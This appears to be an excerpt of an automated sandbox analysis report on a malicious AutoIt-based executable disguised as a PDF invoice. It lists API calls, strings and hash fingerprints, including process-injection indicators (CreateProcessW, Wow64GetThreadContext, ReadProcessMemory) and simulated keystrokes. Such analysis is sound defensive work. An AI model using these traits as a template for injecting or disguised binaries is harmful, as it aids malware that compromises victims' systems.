                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 776569668-0
                                                                                                                      • Opcode ID: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                                                                                                                      • Instruction ID: c50d2a78a5e9f5e0753d9b1935cc7dba445f7a4b2aa1aa02466b312dd18cf473
                                                                                                                      • Opcode Fuzzy Hash: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                                                                                                                      • Instruction Fuzzy Hash: FEE012A16097018ECE64A578AD44BF357FE5F48390B28081DF45DDB143DE2CE842C524
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: CALL
                                                                                                                      • API String ID: 0-4196123274
                                                                                                                      • Opcode ID: a6711eaa1e395620eeab2efe8df9f0740df5f6bbd4b38f2e27b40316b160e663
                                                                                                                      • Instruction ID: 6c4f6eb335bada358de1d23111f6e1a57b9bae56795c8357a5b0c51708d0b963
                                                                                                                      • Opcode Fuzzy Hash: a6711eaa1e395620eeab2efe8df9f0740df5f6bbd4b38f2e27b40316b160e663
                                                                                                                      • Instruction Fuzzy Hash: 4A223870608341DFCB24DF14C495AAABBF1BF45301F14896DE89A8B262D779ED49CB82
                                                                                                                      APIs
                                                                                                                      • IsThemeActive.UXTHEME ref: 00754992
                                                                                                                        • Part of subcall function 007735AC: __lock.LIBCMT ref: 007735B2
                                                                                                                        • Part of subcall function 007735AC: DecodePointer.KERNEL32(00000001,?,007549A7,007A81BC), ref: 007735BE
                                                                                                                        • Part of subcall function 007735AC: EncodePointer.KERNEL32(?,?,007549A7,007A81BC), ref: 007735C9
                                                                                                                        • Part of subcall function 00754A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00754A73
                                                                                                                        • Part of subcall function 00754A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00754A88
                                                                                                                        • Part of subcall function 00753B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00753B7A
                                                                                                                        • Part of subcall function 00753B4C: IsDebuggerPresent.KERNEL32 ref: 00753B8C
                                                                                                                        • Part of subcall function 00753B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,008162F8,008162E0,?,?), ref: 00753BFD
                                                                                                                        • Part of subcall function 00753B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00753C81
                                                                                                                      • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 007549D2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1438897964-0
                                                                                                                      • Opcode ID: 0933d6fb93b306a524e0ec145e58d49a26b338d4e6b37b904d9ab28e84ff69c2
                                                                                                                      • Instruction ID: 4f9f56280749ffc7a747f4dd221ffe97c104dcb8751f6bfa50490cdbc9e84824
                                                                                                                      • Opcode Fuzzy Hash: 0933d6fb93b306a524e0ec145e58d49a26b338d4e6b37b904d9ab28e84ff69c2
                                                                                                                      • Instruction Fuzzy Hash: 0C116A71908311DBC700EF28E80998ABBF8FF94750F00851EF485932A1EBB89659CB96
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0077594C: __FF_MSGBANNER.LIBCMT ref: 00775963
                                                                                                                        • Part of subcall function 0077594C: __NMSG_WRITE.LIBCMT ref: 0077596A
                                                                                                                        • Part of subcall function 0077594C: RtlAllocateHeap.NTDLL(018F0000,00000000,00000001,00000000,?,?,?,00771013,?), ref: 0077598F
                                                                                                                      • std::exception::exception.LIBCMT ref: 0077102C
                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 00771041
                                                                                                                        • Part of subcall function 007787DB: RaiseException.KERNEL32(?,?,?,0080BAF8,00000000,?,?,?,?,00771046,?,0080BAF8,?,00000001), ref: 00778830
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3902256705-0
                                                                                                                      • Opcode ID: 592d018c43c334dee512063b40b3792e6238c940ae352cda591065763eb6f4a5
                                                                                                                      • Instruction ID: f1b351b1f61827455b60c9183e161a1122bf4a6394c303415d1fe05429245982
                                                                                                                      • Opcode Fuzzy Hash: 592d018c43c334dee512063b40b3792e6238c940ae352cda591065763eb6f4a5
                                                                                                                      • Instruction Fuzzy Hash: 2BF0F43464025DE6CF20EA9CEC09ADF77AC9F003D0F608425F90C96182EFF89A91D2E1
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __lock_file_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 26237723-0
                                                                                                                      • Opcode ID: ae9d1fcc397d940a832e24e3c1a71191e0f5945b72ddaa5f71021c6cdadb3a05
                                                                                                                      • Instruction ID: 337e3d9dc1f240713db62682d8731da08466e836d484096f5415b2ae5a8b6435
                                                                                                                      • Opcode Fuzzy Hash: ae9d1fcc397d940a832e24e3c1a71191e0f5945b72ddaa5f71021c6cdadb3a05
                                                                                                                      • Instruction Fuzzy Hash: F6018871C00604EBCF51AFA5CC0999E7B61BF403E0F14C215F81C5A1A1DB798651DB92
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00778D68: __getptd_noexit.LIBCMT ref: 00778D68
                                                                                                                      • __lock_file.LIBCMT ref: 0077561B
                                                                                                                        • Part of subcall function 00776E4E: __lock.LIBCMT ref: 00776E71
                                                                                                                      • __fclose_nolock.LIBCMT ref: 00775626
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2800547568-0
                                                                                                                      • Opcode ID: 2c868f2c19c4a6da4ce27f667804054267d1de3733e9b7ca0fa9b65a6cbd2d02
                                                                                                                      • Instruction ID: 76dd5afdacce1878262677010bc6db30a3c0f12977f1968636e21aa4529c5bfa
                                                                                                                      • Opcode Fuzzy Hash: 2c868f2c19c4a6da4ce27f667804054267d1de3733e9b7ca0fa9b65a6cbd2d02
                                                                                                                      • Instruction Fuzzy Hash: EAF09071941A04DADF60AB75C80EB6E76A16F41BF4F55C209A42CEB1C1CFBC8A019B56
                                                                                                                      APIs
                                                                                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 018D1A5B
                                                                                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 018D1AF1
                                                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 018D1B13
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1673001125.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_18d0000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2438371351-0
                                                                                                                      • Opcode ID: 7bc2eb71131a5ca0d961fb64b4ce1da28befc4a8e94ed8bda1bc50d134690387
                                                                                                                      • Instruction ID: 22f64beee1131dca4797a1390a8efa7d3dc52c16d9388e5bba72064ddedfcdad
                                                                                                                      • Opcode Fuzzy Hash: 7bc2eb71131a5ca0d961fb64b4ce1da28befc4a8e94ed8bda1bc50d134690387
                                                                                                                      • Instruction Fuzzy Hash: 3E12CE24E18658C6EB24DF64D8547DEB232EF68300F1090E9D10DEB7A5E77A4F81CB5A
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClearVariant
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1473721057-0
                                                                                                                      • Opcode ID: fcaccbde6492e2020defe28c25745179e62f621fd42e33e707836ae4c252b587
                                                                                                                      • Instruction ID: 2d6016226db2d7c42b3aef0ae0bb860d1275a85374c76c71ca09a4083192a84e
                                                                                                                      • Opcode Fuzzy Hash: fcaccbde6492e2020defe28c25745179e62f621fd42e33e707836ae4c252b587
                                                                                                                      • Instruction Fuzzy Hash: 02410874604341DFDB14DF14C488B5ABBE1BF45318F1989ACE9994B362C379EC49CB52
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00754D13: FreeLibrary.KERNEL32(00000000,?), ref: 00754D4D
                                                                                                                        • Part of subcall function 0077548B: __wfsopen.LIBCMT ref: 00775496
                                                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,008162F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00754F6F
                                                                                                                        • Part of subcall function 00754CC8: FreeLibrary.KERNEL32(00000000), ref: 00754D02
                                                                                                                        • Part of subcall function 00754DD0: _memmove.LIBCMT ref: 00754E1A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Library$Free$Load__wfsopen_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1396898556-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: ClearVariant
• String ID:
• API String ID: 1473721057-0
APIs
• __lock_file.LIBCMT ref: 00774AD6
  • Part of subcall function 00778D68: __getptd_noexit.LIBCMT ref: 00778D68
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: __getptd_noexit__lock_file
• String ID:
• API String ID: 2597487223-0
APIs
• FreeLibrary.KERNEL32(?,?,008162F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00754FDE
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
APIs
• GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 007709F4
  • Part of subcall function 00757D2C: _memmove.LIBCMT ref: 00757D66
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: LongNamePath_memmove
• String ID:
• API String ID: 2514874351-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: __fread_nolock
• String ID:
• API String ID: 2638373210-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: __wfsopen
• String ID:
• API String ID: 197181222-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
APIs
• Sleep.KERNELBASE(000001F4), ref: 018D22B1
Memory Dump Source
• Source File: 00000000.00000002.1673001125.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_18d0000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
APIs
  • Part of subcall function 00752612: GetWindowLongW.USER32(?,000000EB), ref: 00752623
• DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 007DCE50
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007DCE91
• GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 007DCED6
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007DCF00
• SendMessageW.USER32 ref: 007DCF29
• _wcsncpy.LIBCMT ref: 007DCFA1
• GetKeyState.USER32(00000011), ref: 007DCFC2
• GetKeyState.USER32(00000009), ref: 007DCFCF
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007DCFE5
• GetKeyState.USER32(00000010), ref: 007DCFEF
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007DD018
• SendMessageW.USER32 ref: 007DD03F
• SendMessageW.USER32(?,00001030,?,007DB602), ref: 007DD145
• ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 007DD15B
• ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 007DD16E
• SetCapture.USER32(?), ref: 007DD177
• ClientToScreen.USER32(?,?), ref: 007DD1DC
• ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 007DD1E9
• InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007DD203
• ReleaseCapture.USER32 ref: 007DD20E
• GetCursorPos.USER32(?), ref: 007DD248
• ScreenToClient.USER32(?,?), ref: 007DD255
• SendMessageW.USER32(?,00001012,00000000,?), ref: 007DD2B1
• SendMessageW.USER32 ref: 007DD2DF
• SendMessageW.USER32(?,00001111,00000000,?), ref: 007DD31C
• SendMessageW.USER32 ref: 007DD34B
• SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 007DD36C
• SendMessageW.USER32(?,0000110B,00000009,?), ref: 007DD37B
• GetCursorPos.USER32(?), ref: 007DD39B
• ScreenToClient.USER32(?,?), ref: 007DD3A8
• GetParent.USER32(?), ref: 007DD3C8
• SendMessageW.USER32(?,00001012,00000000,?), ref: 007DD431
• SendMessageW.USER32 ref: 007DD462
• ClientToScreen.USER32(?,?), ref: 007DD4C0
• TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 007DD4F0
                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 007DD51A
                                                                                                                      • SendMessageW.USER32 ref: 007DD53D
                                                                                                                      • ClientToScreen.USER32(?,?), ref: 007DD58F
                                                                                                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 007DD5C3
                                                                                                                        • Part of subcall function 007525DB: GetWindowLongW.USER32(?,000000EB), ref: 007525EC
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 007DD65F
                                                                                                                      Strings
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
• String ID: @GUI_DRAGID$F
• API String ID: 3977979337-4164748364
• Opcode ID: d506195aa608ec61a2df23d07b81a305c8ebb6b62a3a922996fa7dabab31f377
• Instruction ID: dd6fb6bbbb91a6a51723c0a86d7caba234147e1f3c135aa906ac42d2e08f79a3
• Opcode Fuzzy Hash: d506195aa608ec61a2df23d07b81a305c8ebb6b62a3a922996fa7dabab31f377
• Instruction Fuzzy Hash: 28428C70209251AFD722CF28C848AAABBF5FF48314F14452EF696973A1D739D854CF92
APIs
• SendMessageW.USER32(?,00000400,00000000,00000000), ref: 007D873F
Strings
Similarity
• API ID: MessageSend
• String ID: %d/%02d/%02d
• API String ID: 3850602802-328681919
• Opcode ID: 7424becc3d2f147f9a1953321bd5e8c99279fa58993c8eb8bc9700c804debd2f
• Instruction ID: 4421318b62d5a929ca149abecdc773add703dab6dd4ed697e70e832e496413e4
• Opcode Fuzzy Hash: 7424becc3d2f147f9a1953321bd5e8c99279fa58993c8eb8bc9700c804debd2f
• Instruction Fuzzy Hash: F812E471501208EFEB658F68CC49FAE7BB8EF45710F14812AF916EA2E1DF789941CB11
APIs
Strings
Similarity
• API ID: _memmove$_memset
• String ID: DEFINE$Oav$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
• API String ID: 1357608183-3379304892
• Opcode ID: 051e3f1b0b4cd0a151cde6f30f7d9e9bcb609941cb79786ebbce103d6ca9c9d1
• Instruction ID: 6e3956deca3e1ea21a2e7347570d878dd05f40e8d75d4ea51f75d0d99c68a7b0
• Opcode Fuzzy Hash: 051e3f1b0b4cd0a151cde6f30f7d9e9bcb609941cb79786ebbce103d6ca9c9d1
• Instruction Fuzzy Hash: BC93A371E04215DFDB28CF58C8817ADB7B1FF89314F24826AE945EB281E7799E81CB50
APIs
• GetForegroundWindow.USER32(00000000,?), ref: 00754A3D
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0078DA8E
• IsIconic.USER32(?), ref: 0078DA97
• ShowWindow.USER32(?,00000009), ref: 0078DAA4
• SetForegroundWindow.USER32(?), ref: 0078DAAE
• GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0078DAC4
• GetCurrentThreadId.KERNEL32 ref: 0078DACB
• GetWindowThreadProcessId.USER32(?,00000000), ref: 0078DAD7
• AttachThreadInput.USER32(?,00000000,00000001), ref: 0078DAE8
• AttachThreadInput.USER32(?,00000000,00000001), ref: 0078DAF0
• AttachThreadInput.USER32(00000000,?,00000001), ref: 0078DAF8
• SetForegroundWindow.USER32(?), ref: 0078DAFB
• MapVirtualKeyW.USER32(00000012,00000000), ref: 0078DB10
• keybd_event.USER32(00000012,00000000), ref: 0078DB1B
• MapVirtualKeyW.USER32(00000012,00000000), ref: 0078DB25
• keybd_event.USER32(00000012,00000000), ref: 0078DB2A
• MapVirtualKeyW.USER32(00000012,00000000), ref: 0078DB33
• keybd_event.USER32(00000012,00000000), ref: 0078DB38
• MapVirtualKeyW.USER32(00000012,00000000), ref: 0078DB42
• keybd_event.USER32(00000012,00000000), ref: 0078DB47
• SetForegroundWindow.USER32(?), ref: 0078DB4A
• AttachThreadInput.USER32(?,?,00000000), ref: 0078DB71
Strings
Similarity
• API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
• String ID: Shell_TrayWnd
• API String ID: 4125248594-2988720461
• Opcode ID: 21da387f6a263bf5fca5929c8bc336ac1cde4adac034c02ff43fcd97d091f6ee
• Instruction ID: 90e7a6d64bad194c5cb69a1dd240ac80b3016d617f9e79d83e3a82c7d2f91f26
• Opcode Fuzzy Hash: 21da387f6a263bf5fca5929c8bc336ac1cde4adac034c02ff43fcd97d091f6ee
